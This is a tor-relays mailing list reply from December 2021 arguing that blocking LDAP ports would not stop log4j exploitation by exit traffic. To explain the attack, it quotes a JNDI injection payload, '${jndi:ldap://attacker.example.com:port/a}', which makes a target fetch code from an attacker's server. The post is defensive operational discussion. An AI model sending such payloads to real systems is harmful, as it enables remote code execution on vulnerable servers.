[tor-relays] Mitigating log4j exploits
Felix Eckhofer
felix at tribut.de
Sat Dec 11 16:33:55 UTC 2021
Hey,
Am 11.12.2021 13:51, schrieb Jens Kubieziel:
> attacks. One possibility is, in my opinion, rejecting connection over
> ports 389 and 636. What do you think? Should we as exit node operators
> block connections over those LDAP ports for some amount of time?
don't think this is going to help.
The exploit works like this: Send a special string that *references* an
ldap server (most used right now, though other protocols are possible),
such as "${jndi:ldap://attacker.example.com:port/a}". The target then
contacts the ldap server and essentially downloads the malicious code
from there. You can include a custom port as shown and many attackers
do. Most exploit attempts use http(s). Nothing we can block without
packet inspection.
Best regards,
Felix
More information about the tor-relays
mailing list